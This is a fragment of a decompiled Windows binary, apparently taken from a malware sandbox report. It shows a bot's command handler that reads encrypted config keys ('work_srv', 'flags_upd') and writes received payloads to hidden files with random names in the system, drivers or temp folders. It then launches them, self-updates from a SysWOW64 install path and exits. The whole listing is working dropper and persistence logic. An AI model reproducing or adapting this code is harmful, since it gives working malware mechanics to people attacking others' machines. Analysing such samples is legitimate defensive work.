                                                                                																	_t304 =  &(_t428[1]); // 0x3e00001
                                                                                																	_t736 = _t304;
                                                                                																	do {
                                                                                																		_t748 =  *_t428;
                                                                                																		_t428 =  &(_t428[1]);
                                                                                																		__eflags = _t748;
                                                                                																	} while (_t748 != 0);
                                                                                																	_t429 = _t428 - _t736;
                                                                                																	_v12 = _t429;
                                                                                																	__eflags = _t429;
                                                                                																	if(_t429 <= 0) {
                                                                                																		goto L204;
                                                                                																	}
                                                                                																	E0012E8A1(_t748, 1, "localcfg", "except_info", 0x130264);
                                                                                																	_v39 = 0xf;
                                                                                																	_t434 = E0012C65C(_v16,  &_v640,  &_v92,  *0x1336b0, _v12,  &_v52);
                                                                                																	_t811 = _t811 + 0x28;
                                                                                																	__eflags = _t434;
                                                                                																	if(_t434 <= 0) {
                                                                                																		break;
                                                                                																	}
                                                                                																	goto L204;
                                                                                																}
                                                                                																_t760 = 0;
                                                                                																__eflags =  *0x132184; // 0x0
                                                                                																if(__eflags != 0) {
                                                                                																	E00126F5F( &_v408, 0x120);
                                                                                																	_t449 =  *0x132130; // 0x210
                                                                                																	_push(0x132184);
                                                                                																	asm("sbb eax, eax");
                                                                                																	_push( &_v408);
                                                                                																	_t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
                                                                                																	__eflags = _t453;
                                                                                																	_push(_t453);
                                                                                																	_push( *0x132159 & 0x000000ff);
                                                                                																	_push( *0x132134);
                                                                                																	_push( *0x132120);
                                                                                																	_t456 = wsprintfA( *0x1336b0, E00122544(0x1322f8, 0x130fa0, 0x27, 0xe4, 0xc8));
                                                                                																	_t811 = _t811 + 0x34;
                                                                                																	_t760 = _t456;
                                                                                																}
                                                                                																_t793 =  *0x1322d8; // 0x0
                                                                                																__eflags = _t793;
                                                                                																if(_t793 == 0) {
                                                                                																	L193:
                                                                                																	__eflags = _t760;
                                                                                																	if(_t760 == 0) {
                                                                                																		goto L199;
                                                                                																	}
                                                                                																	_v39 = 0xb;
                                                                                																	_t438 = E0012C65C(_v16,  &_v640,  &_v92,  *0x1336b0, _t760,  &_v52);
                                                                                																	_t811 = _t811 + 0x18;
                                                                                																	__eflags = _t438;
                                                                                																	if(_t438 <= 0) {
                                                                                																		break;
                                                                                																	}
                                                                                																	__eflags =  *0x132184; // 0x0
                                                                                																	if(__eflags != 0) {
                                                                                																		 *0x132184 = 0;
                                                                                																	}
                                                                                																	_t439 =  *0x1322d8; // 0x0
                                                                                																	__eflags = _t439;
                                                                                																	if(_t439 != 0) {
                                                                                																		E0012EC2E(_t439);
                                                                                																		 *0x1322d8 = 0;
                                                                                																	}
                                                                                																	goto L199;
                                                                                																} else {
                                                                                																	_t441 = _t793;
                                                                                																	_t293 = _t441 + 1; // 0x1
                                                                                																	_t738 = _t293;
                                                                                																	do {
                                                                                																		_t748 =  *_t441;
                                                                                																		_t441 = _t441 + 1;
                                                                                																		__eflags = _t748;
                                                                                																	} while (_t748 != 0);
                                                                                																	_v60 = _t441 - _t738;
                                                                                																	_t444 =  *0x1336b0; // 0x3e00000
                                                                                																	E0012EE08( &(_t444[_t760]), _t793, _t441 - _t738 + 1);
                                                                                																	_t811 = _t811 + 0xc;
                                                                                																	_t760 =  &(_v60[_t760]);
                                                                                																	__eflags = _t760;
                                                                                																	goto L193;
                                                                                																}
                                                                                															}
                                                                                															while(1) {
                                                                                																_t459 = E0012C06C( &_v24,  &_v39,  *0x1336b0, 0x100000);
                                                                                																_t811 = _t811 + 0x10;
                                                                                																__eflags = _t459;
                                                                                																if(_t459 == 0) {
                                                                                																	goto L186;
                                                                                																}
                                                                                																_t462 = E0012C65C(_t757,  &_v640,  &_v92,  *0x1336b0, _t459,  &_v52);
                                                                                																_t811 = _t811 + 0x18;
                                                                                																__eflags = _t462;
                                                                                																if(_t462 <= 0) {
                                                                                																	goto L228;
                                                                                																}
                                                                                															}
                                                                                															goto L186;
                                                                                														}
                                                                                														_push(0x71c7);
                                                                                														_push( *0x1336b0);
                                                                                														_t463 = E0012E7B4();
                                                                                														__eflags = _t463;
                                                                                														if(_t463 <= 0) {
                                                                                															goto L182;
                                                                                														}
                                                                                														_v39 = 2;
                                                                                														_t467 = E0012C65C(_t757,  &_v640,  &_v92,  *0x1336b0, _t463 * 0x24,  &_v52);
                                                                                														_t811 = _t811 + 0x18;
                                                                                														__eflags = _t467;
                                                                                														if(_t467 <= 0) {
                                                                                															break;
                                                                                														}
                                                                                														goto L182;
                                                                                													}
                                                                                													E00123A00(_t697,  *0x1336b0);
                                                                                													_v39 = 3;
                                                                                													_t472 = E0012C65C(_t757,  &_v640,  &_v92,  *0x1336b0, 0x28,  &_v52);
                                                                                													_t811 = _t811 + 0x1c;
                                                                                													__eflags = _t472;
                                                                                													if(_t472 <= 0) {
                                                                                														break;
                                                                                													}
                                                                                													goto L179;
                                                                                												}
                                                                                												_push(_t697);
                                                                                												_push(0x100000);
                                                                                												_push(_t403);
                                                                                												while(1) {
                                                                                													_t473 = E00123C09(_t748);
                                                                                													_t811 = _t811 + 0xc;
                                                                                													__eflags = _t473;
                                                                                													if(_t473 == 0) {
                                                                                														goto L177;
                                                                                													}
                                                                                													_t697 =  &_v52;
                                                                                													_v39 = 4;
                                                                                													_t476 = E0012C65C(_t757,  &_v640,  &_v92,  *0x1336b0, _t473,  &_v52);
                                                                                													_t811 = _t811 + 0x18;
                                                                                													__eflags = _t476;
                                                                                													if(_t476 <= 0) {
                                                                                														goto L228;
                                                                                													}
                                                                                													_t478 = _v24 & 0x00000010;
                                                                                													__eflags = _t478;
                                                                                													_push(_t478);
                                                                                													_push(0x100000);
                                                                                													_push( *0x1336b0);
                                                                                												}
                                                                                												goto L177;
                                                                                											}
                                                                                											__eflags = _t395 - 2;
                                                                                											if(_t395 == 2) {
                                                                                												_t479 = E0012DF4C(_t748,  *0x1336b0);
                                                                                												__eflags = _t479;
                                                                                												if(_t479 != 0) {
                                                                                													_t480 =  *0x1336b0; // 0x3e00000
                                                                                													E0012ED3B( &(_t480[4]), "work_srv", 8);
                                                                                													_t483 =  *0x1336b0; // 0x3e00000
                                                                                													_t811 = _t811 + 0xc;
                                                                                													__eflags =  *_t483 - 1;
                                                                                													if( *_t483 == 1) {
                                                                                														_t485 = E0012EED1( &(_t483[4]), "work_srv");
                                                                                														__eflags = _t485;
                                                                                														if(_t485 == 0) {
                                                                                															 *0x133680 = 0;
                                                                                															 *0x133674 = 0;
                                                                                															 *0x133678 = 0;
                                                                                															 *0x13367c = 0;
                                                                                															E0012C517();
                                                                                															_v68 = 1;
                                                                                														}
                                                                                													}
                                                                                												}
                                                                                												continue;
                                                                                											}
                                                                                											__eflags = _t395 - 0xa;
                                                                                											if(__eflags == 0) {
                                                                                												E001231D0( *0x1336b0, _v52);
                                                                                												L46:
                                                                                												continue;
                                                                                											}
                                                                                											if(__eflags <= 0) {
                                                                                												L156:
                                                                                												_t763 = 0;
                                                                                												__eflags = 0;
                                                                                												do {
                                                                                													_t249 = _t763 + 0x133300; // 0x0
                                                                                													_t488 =  *_t249;
                                                                                													__eflags = _t488;
                                                                                													if(_t488 == 0) {
                                                                                														goto L165;
                                                                                													}
                                                                                													_t795 =  *(_t488 + 0x40);
                                                                                													__eflags = _t795;
                                                                                													if(_t795 == 0) {
                                                                                														goto L165;
                                                                                													}
                                                                                													_t748 = 0;
                                                                                													_t489 = _t488 + 0xc;
                                                                                													__eflags = _t489;
                                                                                													while(1) {
                                                                                														_t705 =  *_t489;
                                                                                														__eflags = _t705;
                                                                                														if(_t705 == 0) {
                                                                                															goto L165;
                                                                                														}
                                                                                														__eflags = _t705 - _v39;
                                                                                														if(_t705 == _v39) {
                                                                                															 *_t795(_v39,  *0x1336b0, _v52);
                                                                                															_t811 = _t811 + 0xc;
                                                                                															goto L165;
                                                                                														}
                                                                                														_t748 = _t748 + 1;
                                                                                														_t489 = _t489 + 4;
                                                                                														__eflags = _t748 - 0xa;
                                                                                														if(_t748 < 0xa) {
                                                                                															continue;
                                                                                														}
                                                                                														goto L165;
                                                                                													}
                                                                                													L165:
                                                                                													_t763 = _t763 + 4;
                                                                                													__eflags = _t763 - 0x80;
                                                                                												} while (_t763 < 0x80);
                                                                                												continue;
                                                                                											}
                                                                                											__eflags = _t395 - 0xc;
                                                                                											if(_t395 <= 0xc) {
                                                                                												_t796 =  *0x1336b0; // 0x3e00000
                                                                                												_t764 = 0;
                                                                                												_v60 = 0;
                                                                                												_v8 = _t796;
                                                                                												__eflags =  *_t796;
                                                                                												if( *_t796 <= 0) {
                                                                                													L57:
                                                                                													_t701 =  *0x1336b0; // 0x3e00000
                                                                                													_t93 = _t764 * 8; // 0x3e00004
                                                                                													_t797 =  &(_t701[_t93 + 4]);
                                                                                													_t492 = _v52 + 4 + _t764 * 8;
                                                                                													_t704 = _t797[0x124] + 0x128;
                                                                                													_v8 = _t492;
                                                                                													__eflags = _t797[0x124] + 0x128 - _t492;
                                                                                													while(1) {
                                                                                														_v12 = 0;
                                                                                														if(__eflags > 0) {
                                                                                															break;
                                                                                														}
                                                                                														__eflags = _v8;
                                                                                														if(_v8 <= 0) {
                                                                                															break;
                                                                                														}
                                                                                														__eflags =  *_t797 & 0x00000003;
                                                                                														if(( *_t797 & 0x00000003) == 0) {
                                                                                															L150:
                                                                                															_t494 = _t797[0x124];
                                                                                															_t704 = 0xfffffed8 - _t494;
                                                                                															_v8 =  &(_v8[0xfffffffffffffed8]);
                                                                                															_t797 =  &(_t797[_t494 + 0x128]);
                                                                                															__eflags = _t797[0x124] + 0x128 - _v8;
                                                                                															continue;
                                                                                														} else {
                                                                                															E0012EE2A(_t704,  &_v408, 0, 0x120);
                                                                                															_t499 =  *_t797;
                                                                                															_t811 = _t811 + 0xc;
                                                                                															_t765 = 0;
                                                                                															_t711 = 0x100;
                                                                                															__eflags = _t499 & 0x00000f80;
                                                                                															if((_t499 & 0x00000f80) == 0) {
                                                                                																_t618 = _t499 | 0x00000100;
                                                                                																__eflags = _t618;
                                                                                																 *_t797 = _t618;
                                                                                															}
                                                                                															_t500 =  *_t797;
                                                                                															__eflags = _t500 & 0x00000800;
                                                                                															if((_t500 & 0x00000800) != 0) {
                                                                                																_t616 = _t500 & 0xfffff7ff;
                                                                                																 *_t797 = _t616;
                                                                                																__eflags =  *0x13201e; // 0x0
                                                                                																if(__eflags == 0) {
                                                                                																	_t617 = _t616 | 0x00000200;
                                                                                																	__eflags = _t617;
                                                                                																} else {
                                                                                																	_t617 = _t616 | _t711;
                                                                                																}
                                                                                																 *_t797 = _t617;
                                                                                															}
                                                                                															_t501 =  *_t797;
                                                                                															__eflags = _t501;
                                                                                															if(_t501 >= 0) {
                                                                                																__eflags = _t711 & _t501;
                                                                                																if((_t711 & _t501) == 0) {
                                                                                																	__eflags = _t501 & 0x00000200;
                                                                                																	if((_t501 & 0x00000200) == 0) {
                                                                                																		__eflags = _t501 & 0x00000400;
                                                                                																		if((_t501 & 0x00000400) == 0) {
                                                                                																			goto L96;
                                                                                																		}
                                                                                																		GetSystemDirectoryA( &_v408, 0x100);
                                                                                																		_t595 =  &_v408;
                                                                                																		_t775 = _t595 + 1;
                                                                                																		do {
                                                                                																			_t723 =  *_t595;
                                                                                																			_t595 = _t595 + 1;
                                                                                																			__eflags = _t723;
                                                                                																		} while (_t723 != 0);
                                                                                																		_t596 = _t595 - _t775;
                                                                                																		__eflags = _t596;
                                                                                																		if(_t596 != 0) {
                                                                                																			__eflags =  *((char*)(_t806 + _t596 - 0x195)) - 0x5c;
                                                                                																			if( *((char*)(_t806 + _t596 - 0x195)) != 0x5c) {
                                                                                																				 *((char*)(_t806 + _t596 - 0x194)) = 0x5c;
                                                                                																			}
                                                                                																		}
                                                                                																		E0012EF1E( &_v408, "drivers\\");
                                                                                																		_t776 =  &_v408;
                                                                                																		_t141 = _t776 + 1; // 0x5d
                                                                                																		_t711 = _t141;
                                                                                																		do {
                                                                                																			_t599 =  *_t776;
                                                                                																			_t776 = _t776 + 1;
                                                                                																			__eflags = _t599;
                                                                                																		} while (_t599 != 0);
                                                                                																		_t765 = _t776 - _t711;
                                                                                																		__eflags = _t765;
                                                                                																		goto L96;
                                                                                																	}
                                                                                																	GetSystemDirectoryA( &_v408, 0x100);
                                                                                																	_t777 =  &_v408;
                                                                                																	_t602 = _t777 + 1;
                                                                                																	do {
                                                                                																		_t711 =  *_t777;
                                                                                																		_t777 = _t777 + 1;
                                                                                																		__eflags = _t711;
                                                                                																	} while (_t711 != 0);
                                                                                																	_t765 = _t777 - _t602;
                                                                                																	__eflags = _t765;
                                                                                																	goto L83;
                                                                                																} else {
                                                                                																	GetEnvironmentVariableA(E00122544(0x1322f8, 0x130a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
                                                                                																	E0012EE2A(_t711, 0x1322f8, 0, 0x100);
                                                                                																	_t607 =  &_v408;
                                                                                																	_t811 = _t811 + 0x20;
                                                                                																	_t779 = _t607 + 1;
                                                                                																	goto L77;
                                                                                																	L83:
                                                                                																	__eflags = _t765;
                                                                                																	if(_t765 == 0) {
                                                                                																		goto L96;
                                                                                																	}
                                                                                																	__eflags =  *((char*)(_t806 + _t765 - 0x195)) - 0x5c;
                                                                                																	goto L85;
                                                                                																	L77:
                                                                                																	_t711 =  *_t607;
                                                                                																	_t607 = _t607 + 1;
                                                                                																	__eflags = _t711;
                                                                                																	if(_t711 != 0) {
                                                                                																		goto L77;
                                                                                																	} else {
                                                                                																		_t765 = _t607 - _t779;
                                                                                																		goto L83;
                                                                                																	}
                                                                                																}
                                                                                															} else {
                                                                                																_t109 =  &(_t797[4]); // 0x3e00008
                                                                                																_t780 = _t109;
                                                                                																_t609 = _t109;
                                                                                																_t110 =  &(_t609[1]); // 0x3e00009
                                                                                																_t726 = _t110;
                                                                                																goto L69;
                                                                                																do {
                                                                                																	L71:
                                                                                																	_t711 =  *_t613;
                                                                                																	_t613 = _t613 + 1;
                                                                                																	__eflags = _t711;
                                                                                																} while (_t711 != 0);
                                                                                																_t765 = _t613 - _t781;
                                                                                																__eflags = _t765;
                                                                                																if(_t765 == 0) {
                                                                                																	L96:
                                                                                																	__eflags =  *_t797 & 0x00000004;
                                                                                																	if(( *_t797 & 0x00000004) == 0) {
                                                                                																		_t165 =  &(_t797[0x104]); // 0x3e00108
                                                                                																		_t502 = _t165;
                                                                                																		L106:
                                                                                																		_push(_t502);
                                                                                																		L107:
                                                                                																		lstrcatA( &_v408, ??);
                                                                                																		L108:
                                                                                																		__eflags =  *_t797 & 0x00000040;
                                                                                																		if(( *_t797 & 0x00000040) != 0) {
                                                                                																			E00128E26(_t711, _t748, 0x22c808, 0, 0, 0, 0,  &_v56);
                                                                                																			_t811 = _t811 + 0x18;
                                                                                																		}
                                                                                																		__eflags = _v39 - 0xc;
                                                                                																		if(_v39 == 0xc) {
                                                                                																			_t583 = E0012EE95( &_v408, ".dat");
                                                                                																			_pop(_t711);
                                                                                																			__eflags = _t583;
                                                                                																			if(_t583 != 0) {
                                                                                																				SetFileAttributesA( &_v408, 0x80);
                                                                                																			}
                                                                                																		}
                                                                                																		_t766 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                																		__eflags = _t766 - 0xffffffff;
                                                                                																		if(_t766 == 0xffffffff) {
                                                                                																			E0012EE2A(_t711,  &_v408, 0, 0x120);
                                                                                																			GetEnvironmentVariableA(E00122544(0x1322f8, 0x130a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
                                                                                																			E0012EE2A(_t711, 0x1322f8, 0, 0x100);
                                                                                																			_t513 =  &_v408;
                                                                                																			_t811 = _t811 + 0x2c;
                                                                                																			_t768 = _t513 + 1;
                                                                                																			do {
                                                                                																				_t712 =  *_t513;
                                                                                																				_t513 = _t513 + 1;
                                                                                																				__eflags = _t712;
                                                                                																			} while (_t712 != 0);
                                                                                																			_t514 = _t513 - _t768;
                                                                                																			__eflags = _t514;
                                                                                																			if(_t514 != 0) {
                                                                                																				__eflags =  *((char*)(_t806 + _t514 - 0x195)) - 0x5c;
                                                                                																				if( *((char*)(_t806 + _t514 - 0x195)) != 0x5c) {
                                                                                																					 *((char*)(_t806 + _t514 - 0x194)) = 0x5c;
                                                                                																				}
                                                                                																			}
                                                                                																			_t210 =  &(_t797[0x104]); // 0x3e00108
                                                                                																			lstrcatA( &_v408, _t210);
                                                                                																			__eflags = _v39 - 0xc;
                                                                                																			if(_v39 == 0xc) {
                                                                                																				_t545 = E0012EE95( &_v408, ".dat");
                                                                                																				_pop(_t712);
                                                                                																				__eflags = _t545;
                                                                                																				if(_t545 != 0) {
                                                                                																					SetFileAttributesA( &_v408, 0x80);
                                                                                																				}
                                                                                																			}
                                                                                																			_t769 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                																			__eflags = _t769 - 0xffffffff;
                                                                                																			if(_t769 != 0xffffffff) {
                                                                                																				_t218 =  &(_t797[0x128]); // 0x3e0012c
                                                                                																				WriteFile(_t769, _t218, _t797[0x124],  &_v56, 0);
                                                                                																				CloseHandle(_t769);
                                                                                																				__eflags = _v39 - 0xc;
                                                                                																				if(_v39 == 0xc) {
                                                                                																					_t541 = E0012EE95( &_v408, ".dat");
                                                                                																					_pop(_t712);
                                                                                																					__eflags = _t541;
                                                                                																					if(_t541 != 0) {
                                                                                																						SetFileAttributesA( &_v408, 2);
                                                                                																					}
                                                                                																				}
                                                                                																				_v12 = 1;
                                                                                																			}
                                                                                																			goto L143;
                                                                                																		} else {
                                                                                																			_t176 =  &(_t797[0x128]); // 0x3e0012c
                                                                                																			WriteFile(_t766, _t176, _t797[0x124],  &_v56, 0);
                                                                                																			CloseHandle(_t766);
                                                                                																			__eflags = _v39 - 0xc;
                                                                                																			if(_v39 == 0xc) {
                                                                                																				_t579 = E0012EE95( &_v408, ".dat");
                                                                                																				__eflags = _t579;
                                                                                																				if(_t579 != 0) {
                                                                                																					SetFileAttributesA( &_v408, 2);
                                                                                																				}
                                                                                																			}
                                                                                																			_v12 = 1;
                                                                                																			_t552 = E0012EE95( &_v408, ".dat");
                                                                                																			_pop(_t712);
                                                                                																			__eflags = _t552;
                                                                                																			if(_t552 == 0) {
                                                                                																				L143:
                                                                                																				__eflags =  *_t797 & 0x00000040;
                                                                                																				if(( *_t797 & 0x00000040) != 0) {
                                                                                																					E00128E26(_t712, _t748, 0x22c80c, 0, 0, 0, 0,  &_v56);
                                                                                																					_t811 = _t811 + 0x18;
                                                                                																				}
                                                                                																				__eflags =  *_t797 & 0x00000002;
                                                                                																				if(( *_t797 & 0x00000002) != 0) {
                                                                                																					__eflags = _v12;
                                                                                																					if(__eflags != 0) {
                                                                                																						E00127EAD(_t748, __eflags, 1);
                                                                                																						E00127FCF(_t712);
                                                                                																						_t770 = 0x44;
                                                                                																						E0012EE2A(_t712,  &_v876, 0, _t770);
                                                                                																						_t811 = _t811 + 0x10;
                                                                                																						_v876.cb = _t770;
                                                                                																						_t527 = CreateProcessA( &_v408, 0x130264, 0, 0, 0, 0x8000000, 0, 0,  &_v876,  &_v424);
                                                                                																						__eflags = _t527;
                                                                                																						if(_t527 == 0) {
                                                                                																							E00127EE6(_t712);
                                                                                																							E00127EAD(_t748, __eflags, 0);
                                                                                																							DeleteFileA( &_v408);
                                                                                																						} else {
                                                                                																							CloseHandle(_v424.hThread);
                                                                                																							CloseHandle(_v424);
                                                                                																						}
                                                                                																					}
                                                                                																				}
                                                                                																				goto L150;
                                                                                																			} else {
                                                                                																				E0012EE2A(_t712,  &_v408, 0, 0x120);
                                                                                																				GetEnvironmentVariableA(E00122544(0x1322f8, 0x130a3c, 0xc, 0xe4, 0xc8),  &_v408, 0x100);
                                                                                																				E0012EE2A(_t712, 0x1322f8, 0, 0x100);
                                                                                																				_t559 =  &_v408;
                                                                                																				_t811 = _t811 + 0x2c;
                                                                                																				_t773 = _t559 + 1;
                                                                                																				do {
                                                                                																					_t712 =  *_t559;
                                                                                																					_t559 = _t559 + 1;
                                                                                																					__eflags = _t712;
                                                                                																				} while (_t712 != 0);
                                                                                																				_t560 = _t559 - _t773;
                                                                                																				__eflags = _t560;
                                                                                																				if(_t560 != 0) {
                                                                                																					__eflags =  *((char*)(_t806 + _t560 - 0x195)) - 0x5c;
                                                                                																					if( *((char*)(_t806 + _t560 - 0x195)) != 0x5c) {
                                                                                																						 *((char*)(_t806 + _t560 - 0x194)) = 0x5c;
                                                                                																					}
                                                                                																				}
                                                                                																				_t190 =  &(_t797[0x104]); // 0x3e00108
                                                                                																				lstrcatA( &_v408, _t190);
                                                                                																				__eflags = _v39 - 0xc;
                                                                                																				if(_v39 == 0xc) {
                                                                                																					_t575 = E0012EE95( &_v408, ".dat");
                                                                                																					_pop(_t712);
                                                                                																					__eflags = _t575;
                                                                                																					if(_t575 != 0) {
                                                                                																						SetFileAttributesA( &_v408, 0x80);
                                                                                																					}
                                                                                																				}
                                                                                																				_t774 = CreateFileA( &_v408, 0xc0000000, 0, 0, 2, 0x80, 0);
                                                                                																				__eflags = _t774 - 0xffffffff;
                                                                                																				if(_t774 != 0xffffffff) {
                                                                                																					_t198 =  &(_t797[0x128]); // 0x3e0012c
                                                                                																					WriteFile(_t774, _t198, _t797[0x124],  &_v56, 0);
                                                                                																					CloseHandle(_t774);
                                                                                																					__eflags = _v39 - 0xc;
                                                                                																					if(_v39 == 0xc) {
                                                                                																						_t571 = E0012EE95( &_v408, ".dat");
                                                                                																						_pop(_t712);
                                                                                																						__eflags = _t571;
                                                                                																						if(_t571 != 0) {
                                                                                																							SetFileAttributesA( &_v408, 2);
                                                                                																						}
                                                                                																					}
                                                                                																				}
                                                                                																				goto L143;
                                                                                																			}
                                                                                																		}
                                                                                																	}
                                                                                																	_t588 = E0012ECA5();
                                                                                																	_t711 = 5;
                                                                                																	_t748 = _t588 % _t711 + 3;
                                                                                																	__eflags = _t748;
                                                                                																	_v17 = _t748;
                                                                                																	if(_t748 == 0) {
                                                                                																		L99:
                                                                                																		 *(_t806 + _t765 - 0x194) = 0;
                                                                                																		_t590 =  *_t797;
                                                                                																		__eflags = _t590 & 0x0000000a;
                                                                                																		if((_t590 & 0x0000000a) != 0) {
                                                                                																			_t502 = E00122544(0x1322f8, 0x130694, 5, 0xe4, 0xc8);
                                                                                																			_t811 = _t811 + 0x14;
                                                                                																			goto L106;
                                                                                																		}
                                                                                																		__eflags = _t590 & 0x00000010;
                                                                                																		if((_t590 & 0x00000010) == 0) {
                                                                                																			__eflags = _t590 & 0x00000020;
                                                                                																			if((_t590 & 0x00000020) == 0) {
                                                                                																				goto L108;
                                                                                																			}
                                                                                																			_push(".dat");
                                                                                																			goto L107;
                                                                                																		}
                                                                                																		_push(".sys");
                                                                                																		goto L107;
                                                                                																	} else {
                                                                                																		goto L98;
                                                                                																	}
                                                                                																	do {
                                                                                																		L98:
                                                                                																		_t591 = E0012ECA5();
                                                                                																		_t711 = 0x19;
                                                                                																		_t748 = _t591 % _t711 + 0x61;
                                                                                																		 *(_t806 + _t765 - 0x194) = _t748;
                                                                                																		_t765 = _t765 + 1;
                                                                                																		_t155 =  &_v17;
                                                                                																		 *_t155 = _v17 - 1;
                                                                                																		__eflags =  *_t155;
                                                                                																	} while ( *_t155 != 0);
                                                                                																	goto L99;
                                                                                																}
                                                                                																_t615 =  *((intOrPtr*)(_t806 + _t765 - 0x195));
                                                                                																__eflags = _t615 - 0x5c;
                                                                                																if(_t615 != 0x5c) {
                                                                                																	__eflags = _t615 - 0x2f;
                                                                                																	L85:
                                                                                																	if(__eflags != 0) {
                                                                                																		 *(_t806 + _t765 - 0x194) = 0x5c;
                                                                                																		_t765 = _t765 + 1;
                                                                                																	}
                                                                                																}
                                                                                																goto L96;
                                                                                																L69:
                                                                                																_t748 =  *_t609;
                                                                                																_t609 =  &(_t609[1]);
                                                                                																__eflags = _t748;
                                                                                																if(_t748 != 0) {
                                                                                																	goto L69;
                                                                                																} else {
                                                                                																	__eflags = _t609 - _t726;
                                                                                																	E0012EE08( &_v408, _t780, _t609 - _t726);
                                                                                																	_t613 =  &_v408;
                                                                                																	_t811 = _t811 + 0xc;
                                                                                																	_t781 = _t613 + 1;
                                                                                																	goto L71;
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                													}
                                                                                													__eflags =  *0x13211c & 0x00000004;
                                                                                													if(( *0x13211c & 0x00000004) == 0) {
                                                                                														continue;
                                                                                													}
                                                                                													__eflags = _v60;
                                                                                													if(_v60 == 0) {
                                                                                														continue;
                                                                                													}
                                                                                													__eflags =  *0x13201d; // 0x0
                                                                                													if(__eflags == 0) {
                                                                                														continue;
                                                                                													}
                                                                                													__imp__#3(_v16);
                                                                                													Sleep(0x3e8);
                                                                                													E0012E318();
                                                                                													ExitProcess(0);
                                                                                												} else {
                                                                                													_t798 =  &(_t796[8]);
                                                                                													__eflags = _t798;
                                                                                													do {
                                                                                														_t621 =  *(_t798 - 4);
                                                                                														__eflags = _t621;
                                                                                														if(_t621 == 0) {
                                                                                															_v60 = 1;
                                                                                															 *0x132138 =  *_t798;
                                                                                														} else {
                                                                                															_t624 = _t621 - 1;
                                                                                															__eflags = _t624;
                                                                                															if(_t624 == 0) {
                                                                                																E0012EA84(1, "localcfg", "lid_file_upd",  *_t798);
                                                                                																_t811 = _t811 + 0x10;
                                                                                																 *0x13213c =  *_t798;
                                                                                															} else {
                                                                                																__eflags = _t624 == 1;
                                                                                																if(_t624 == 1) {
                                                                                																	E0012EA84(1, "localcfg", "flags_upd",  *_t798);
                                                                                																	_t811 = _t811 + 0x10;
                                                                                																	 *0x13211c =  *0x13211c |  *_t798;
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                														_t764 = _t764 + 1;
                                                                                														_t798 =  &(_t798[2]);
                                                                                														__eflags = _t764 -  *_v8;
                                                                                													} while (_t764 <  *_v8);
                                                                                													goto L57;
                                                                                												}
                                                                                											}
                                                                                											__eflags = _t395 - 0x1b;
                                                                                											if(_t395 != 0x1b) {
                                                                                												goto L156;
                                                                                											}
                                                                                											__eflags = _v52 - 0xc;
                                                                                											if(_v52 <= 0xc) {
                                                                                												_t630 =  *0x1336b0; // 0x3e00000
                                                                                												 *0x1321a4 = _t630[4];
                                                                                												 *0x1322d4 = _t630[8];
                                                                                												_t632 = E0012F04E(0);
                                                                                												asm("adc edx, ebx");
                                                                                												 *0x1336a8 = _t632 + 0xe10;
                                                                                												 *0x1336ac = _t748;
                                                                                												continue;
                                                                                											}
                                                                                											_t634 = E00127E2F(_t748);
                                                                                											__eflags = _t634;
                                                                                											if(_t634 != 0) {
                                                                                												continue;
                                                                                											}
                                                                                											_t635 =  *0x1336b0; // 0x3e00000
                                                                                											_v12 = _t635;
                                                                                											__eflags = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe"; // 0x43
                                                                                											if(__eflags == 0) {
                                                                                												L45:
                                                                                												_t636 = _v12;
                                                                                												 *0x1321a4 =  *(_t636 + 4);
                                                                                												 *0x1322d4 =  *(_t636 + 8);
                                                                                												E00127EAD(_t748, __eflags, 0);
                                                                                												goto L46;
                                                                                											} else {
                                                                                												GetTempPathA(0x120,  &_v408);
                                                                                												_t642 = E00128274( &_v408);
                                                                                												_pop(_t709);
                                                                                												_t782 = _t642;
                                                                                												_t801 = (E0012ECA5() & 0x00000003) + 5;
                                                                                												goto L38;
                                                                                												L38:
                                                                                												__eflags = _t801;
                                                                                												if(_t801 > 0) {
                                                                                													_t644 = E0012ECA5();
                                                                                													_t709 = 0x1a;
                                                                                													_t748 = _t644 % _t709 + 0x61;
                                                                                													 *(_t806 + _t782 - 0x194) = _t748;
                                                                                													_t782 = _t782 + 1;
                                                                                													_t801 = _t801 - 1;
                                                                                													__eflags = _t801;
                                                                                													goto L38;
                                                                                												} else {
                                                                                													E0012EF00(_t806 + _t782 - 0x194, E00122544(0x1322f8, 0x130694, 5, 0xe4, 0xc8));
                                                                                													E0012EE2A(_t709, 0x1322f8, 0, 0x100);
                                                                                													_t811 = _t811 + 0x28;
                                                                                													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
                                                                                													_v8 = _t651;
                                                                                													__eflags = _t651 - 0xffffffff;
                                                                                													if(__eflags != 0) {
                                                                                														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
                                                                                														_push(_v8);
                                                                                														__eflags = _t657;
                                                                                														if(__eflags == 0) {
                                                                                															CloseHandle();
                                                                                														} else {
                                                                                															CloseHandle();
                                                                                															_push("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe");
                                                                                															_push( &_v408);
                                                                                															wsprintfA( &_v1176, E00122544(0x1322f8, 0x130fe4, 0xc, 0xe4, 0xc8));
                                                                                															E0012EE2A(_t709, 0x1322f8, 0, 0x100);
                                                                                															_t803 = 0x44;
                                                                                															E0012EE2A(_t709,  &_v808, 0, 0x1322f8);
                                                                                															_v808.cb = _t803;
                                                                                															E0012EE2A(_t709,  &_v120, 0, 0x10);
                                                                                															_t811 = _t811 + 0x48;
                                                                                															E00127FCF(_t709);
                                                                                															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
                                                                                															__eflags = _t673;
                                                                                															if(_t673 != 0) {
                                                                                																WaitForSingleObject(_v120.hProcess, 0xea60);
                                                                                																CloseHandle(_v120.hThread);
                                                                                																CloseHandle(_v120);
                                                                                																_t681 = E0012F04E(0) + 0xe10;
                                                                                																__eflags = _t681;
                                                                                																asm("adc edx, ebx");
                                                                                																_pop(_t709);
                                                                                																 *0x1336a8 = _t681;
                                                                                																 *0x1336ac = _t748;
                                                                                															}
                                                                                															E00127EE6(_t709);
                                                                                															DeleteFileA( &_v408);
                                                                                														}
